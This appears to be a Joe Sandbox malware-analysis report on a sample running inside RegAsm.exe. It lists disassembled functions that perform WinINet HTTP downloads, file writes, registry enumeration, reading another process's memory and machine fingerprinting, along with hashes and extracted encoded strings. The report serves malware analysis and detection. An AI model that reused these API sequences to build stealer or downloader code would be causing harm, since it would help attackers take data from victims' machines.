                                                                                                                                                                                                            • Instruction ID: ed9d8f8ccf835608a153ad5964d038a4fb43ff398baa7d4a7f259f7fc87ea408
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa12b8d585db11d4d61522ce74fbf5b729377d92af5562b28b7be1e754fef68e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BC1E8B5900109BFCB14EBA4DD45EEEB779AF54304F00816EF506B3292EE389749CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00405960 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 200networkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405A7A
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405A98
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,0041FEE9), ref: 00405AE5
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,0041FEE9), ref: 00405B3B
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405B46
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405B50
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405B5A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                            • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                            • API String ID: 1851261701-2509457195
                                                                                                                                                                                                            • Opcode ID: bbde85d54317d74bc49b58ff975bd8dbab536fde0067ea99caf2cccf267b668e
                                                                                                                                                                                                            • Instruction ID: e21d45a569fd4ca9665c470c8ef0dfb583eaa1871c9a13eb6f94b2bca7a67973
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbde85d54317d74bc49b58ff975bd8dbab536fde0067ea99caf2cccf267b668e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C617D71900518AFEB10DBA4DC85FEFB779EB49704F00417AFA05B3281DB786E498BA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00404B20 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404B7B
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404B82
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404BA0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 00404BB6
                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BE1
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00404C1B
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404C40
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C52
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404C74
                                                                                                                                                                                                            • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404CE4
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404D15
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404D1F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404D29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                            • API String ID: 442264750-1805413626
                                                                                                                                                                                                            • Opcode ID: a04fa77e993117e9ae6753620fccfb9e201f0dbe7e63d19d445a57339d57b18b
                                                                                                                                                                                                            • Instruction ID: 8cd9884ad1fc3f3f03916256708021e697921895d0734bb802fa2eb576915c65
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a04fa77e993117e9ae6753620fccfb9e201f0dbe7e63d19d445a57339d57b18b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 596164B5A00219ABEB20DBA4DC45FEF77B9EB89710F104129FA05F72C0D7789904CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004106E0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 210registrystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,00CB65D8,00000000,00020019,00000000,00426EEF,?,00000001), ref: 0041073F
                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(00000000,?,?,TsB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041079E
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004107C7
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107E5
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00CC1C30,00000000,000F003F,?,00000400), ref: 00410815
                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0041082A
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00CC1B58,00000000,000F003F,?,00000400,00000000,00421861,?,00000000,?,00426F20), ref: 004108AE
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                            • String ID: - $%s\%s$?$TsB$TsB
                                                                                                                                                                                                            • API String ID: 1989970852-2363097296
                                                                                                                                                                                                            • Opcode ID: 42c929a5319494dbfdd80b447cab84c491721e04517d8dafdc4a260e5da28095
                                                                                                                                                                                                            • Instruction ID: c37df9196de91915ab64f267fc4f9f5e18cc47e0870841395467f1ab9e04a580
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42c929a5319494dbfdd80b447cab84c491721e04517d8dafdc4a260e5da28095
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84813CB191012DABDB14DB95DC94EEEB7B9FF48704F10416EF506B3281DB786A08CBA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040FA00 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040FA2B
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FA53
                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FA74
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FAB0
                                                                                                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FB0B
                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FB18
                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FB5E
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FBAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • N0ZWFt, xrefs: 0040FB59, 0040FB69
                                                                                                                                                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FAC6, 0040FBC3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                            • API String ID: 47329967-1622206642
                                                                                                                                                                                                            • Opcode ID: 69f63cbc825e08b570e1e99291a4cafed0f85a831e9aeba1288f30d2c272a227
                                                                                                                                                                                                            • Instruction ID: c2b1ce11c6955a207ab61ca24124c1b4d628eae94c936b03501c7fec3e54ffde
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69f63cbc825e08b570e1e99291a4cafed0f85a831e9aeba1288f30d2c272a227
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E612171E00209ABEB30DBA4DC41BAFB7B8AB85714F10457EF804776C1D7B859488BA9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410C10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C48
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(004218D9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C81
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410CCD
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410CD4
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410D11
                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00426EC8), ref: 00410D20
                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410BC5
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00410D42
                                                                                                                                                                                                              • Part of subcall function 00411A30: malloc.MSVCRT ref: 00411A41
                                                                                                                                                                                                              • Part of subcall function 00411A30: strncpy.MSVCRT ref: 00411A51
                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00410D70
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                            • String ID: :\$C$}A$}A
                                                                                                                                                                                                            • API String ID: 2389002695-1871846370
                                                                                                                                                                                                            • Opcode ID: 3dec7d0a4b43cc9982cf05f26fc3d92d9781bdefe40dc1b247af77a25a312847
                                                                                                                                                                                                            • Instruction ID: 8044340af6f6f6e1698f73371b79e196aa55a7e5cb8ce5909912baacc658985d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dec7d0a4b43cc9982cf05f26fc3d92d9781bdefe40dc1b247af77a25a312847
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D416271D01219ABDB10EBE4DD45BEEBB78AF09704F10016EFA05B7281DB785A44CBE9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00413A50 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 161stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                              • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                              • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413AE4
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421EC9), ref: 00413AFB
                                                                                                                                                                                                              • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,00413B11,?,00000001,00000004,?,00413B10,00000000,00000000), ref: 004115CC
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00413B27
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00413B3C
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00413B59
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$#B
                                                                                                                                                                                                            • API String ID: 2440237315-3466126190
                                                                                                                                                                                                            • Opcode ID: 51953f7b9398263dfdedb4ca792dfba2eb44f17ec7fb0a6f37ceb440fb5fd4f1
                                                                                                                                                                                                            • Instruction ID: beee05622821628ea9466e97406787f5c1d4d4219a312b6668226950b36aedab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51953f7b9398263dfdedb4ca792dfba2eb44f17ec7fb0a6f37ceb440fb5fd4f1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E519030904258EACB10EFA5C9557DDBBA4AF19308F50407EEC0673682DB7C5B0CC7A6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004057A0 Relevance: 15.1, APIs: 10, Instructions: 142networkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405805
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,0000000B), ref: 00405831
                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405856
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405879
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405892
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,000000FF,0041FE98,00000000,?,?,?,?,?,?,0000000B), ref: 004058B6
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004058E0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 004058FC
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405903
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040590A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 105467990-0
                                                                                                                                                                                                            • Opcode ID: 9bf2c98d172f53f0d86058756b69f78b3186c01c33ec54ebf090ffba581c02ca
                                                                                                                                                                                                            • Instruction ID: b699016bbc4dae99e5489df74d4a342dbfbc2a4b151be8a16a5bb1eb09b0d4db
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bf2c98d172f53f0d86058756b69f78b3186c01c33ec54ebf090ffba581c02ca
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79518375500214ABEB10EBA0DC4AFEE7778EF05704F504569FA05F71C1DB78AA09CBA9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040E800 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 532COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040E8E5
